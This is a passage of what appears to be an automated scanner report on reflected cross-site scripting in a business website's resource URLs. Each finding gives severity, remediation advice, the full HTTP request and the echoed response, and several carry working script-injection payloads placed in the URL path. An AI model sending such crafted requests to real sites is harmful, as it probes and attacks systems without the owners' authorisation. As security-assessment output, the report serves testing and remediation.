var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.587. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a11-111-Voice.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ca8c</script><script>alert(1)</script>6866bdc58a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a11-111-Voice.xml5ca8c</script><script>alert(1)</script>6866bdc58a7 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "566b9899418775066f21b841000ea736"
Last-Modified: Wed, 17 Nov 2010 00:29:21 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:29:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d86e6851c-70a7-4edb-8993-369aaa38c77f|VTID%3df5ad4583-bbec-4394-a6e1-eab65577ed53|SX%3d1289954961|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:33:05 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:29:21 GMT
Content-Length: 34985

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a11-111-Voice.xml5ca8c</script><script>alert(1)</script>6866bdc58a7</url>
...[SNIP]...

1.588. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a11-111-Voice.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6065d'%3b95e249ab580 was submitted in the REST URL parameter 2. This input was echoed as 6065d';95e249ab580 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/6065d'%3b95e249ab580 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/6065d';95e249ab580'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.589. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a12-111-VoIP.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0e32"%3b71ce5c2352a was submitted in the REST URL parameter 1. This input was echoed as d0e32";71ce5c2352a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesd0e32"%3b71ce5c2352a/1002a2a12-111-VoIP.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:22 GMT
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesd0e32";71ce5c2352a/1002a2a12-111-VoIP.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.590. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a12-111-VoIP.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bcdc'%3b898de890ade was submitted in the REST URL parameter 1. This input was echoed as 4bcdc';898de890ade in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources4bcdc'%3b898de890ade/1002a2a12-111-VoIP.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40644
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources4bcdc';898de890ade/1002a2a12-111-VoIP.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.591. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a12-111-VoIP.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88ad8'%3b7d9ffc4c1a2 was submitted in the REST URL parameter 2. This input was echoed as 88ad8';7d9ffc4c1a2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/88ad8'%3b7d9ffc4c1a2 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/88ad8';7d9ffc4c1a2'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.592. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a12-111-VoIP.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8961</script><script>alert(1)</script>fe4355bb8c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a12-111-VoIP.xmlb8961</script><script>alert(1)</script>fe4355bb8c8 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "49bf21736d37ff264b48c69f56996fbf"
Last-Modified: Wed, 17 Nov 2010 00:29:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:29:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d76e6e9e5-622c-434e-8229-e361097b1df6|VTID%3d4a709456-7b11-4a39-83a6-7bb46b0b4b0c|SX%3d1289954941|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:32:45 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:29:02 GMT
Content-Length: 48082

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<url>/resources/1002a2a12-111-VoIP.xmlb8961</script><script>alert(1)</script>fe4355bb8c8</url>
...[SNIP]...

1.593. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a13-111-Application+&+Performance+Management.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b936'%3b996ea946b26 was submitted in the REST URL parameter 1. This input was echoed as 7b936';996ea946b26 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources7b936'%3b996ea946b26/1002a2a13-111-Application+&+Performance+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40710
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources7b936';996ea946b26/1002a2a13-111-Application+&+Performance+Management.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.594. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a13-111-Application+&+Performance+Management.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f8de"%3b26c0eb8eaf2 was submitted in the REST URL parameter 1. This input was echoed as 7f8de";26c0eb8eaf2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources7f8de"%3b26c0eb8eaf2/1002a2a13-111-Application+&+Performance+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40710
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources7f8de";26c0eb8eaf2/1002a2a13-111-Application+&+Performance+Management.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FO
...[SNIP]...

1.595. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a13-111-Application+&+Performance+Management.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57eda'%3b26b0237444b was submitted in the REST URL parameter 2. This input was echoed as 57eda';26b0237444b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/57eda'%3b26b0237444b&+Performance+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40266
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/57eda';26b0237444b&+Performance+Management.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.596. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a13-111-Application+&+Performance+Management.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2ba0</script><script>alert(1)</script>81f5566ffef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a13-111-Application+f2ba0</script><script>alert(1)</script>81f5566ffef&+Performance+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "c9d77aa89ef728d89e3cbda025e31a40"
Last-Modified: Wed, 17 Nov 2010 00:21:45 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:21:46 GMT
Connection: close
Connection: Transfer-Encoding
Expires: Mon, 16 Nov 2009 18:21:45 GMT
Content-Length: 35047

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a2a13-111-Application+f2ba0</script><script>alert(1)</script>81f5566ffef&+Performance+Management.xml</url>
...[SNIP]...

1.597. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84dc8'%3b8bffbc74894 was submitted in the REST URL parameter 1. This input was echoed as 84dc8';8bffbc74894 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources84dc8'%3b8bffbc74894/1002a2a14-111-Unified+Communications+and+Collaboration.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40716
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources84dc8';8bffbc74894/1002a2a14-111-Unified+Communications+and+Collaboration.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.598. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0a2c"%3b4c08c3bf546 was submitted in the REST URL parameter 1. This input was echoed as d0a2c";4c08c3bf546 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesd0a2c"%3b4c08c3bf546/1002a2a14-111-Unified+Communications+and+Collaboration.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:07 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40716
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesd0a2c";4c08c3bf546/1002a2a14-111-Unified+Communications+and+Collaboration.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";
...[SNIP]...

1.599. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a467</script><script>alert(1)</script>a526a97ff5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml7a467</script><script>alert(1)</script>a526a97ff5a HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "f57d65d01d8cd8d53f0948bd5d4ad643"
Last-Modified: Wed, 17 Nov 2010 00:28:09 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:28:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d2e7dd086-d2e3-43ec-bead-64b4fe33ad4a|VTID%3d75bd7864-a556-4c6f-9d37-4ca4903fa3e4|SX%3d1289954888|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:31:52 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:28:09 GMT
Content-Length: 53126

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
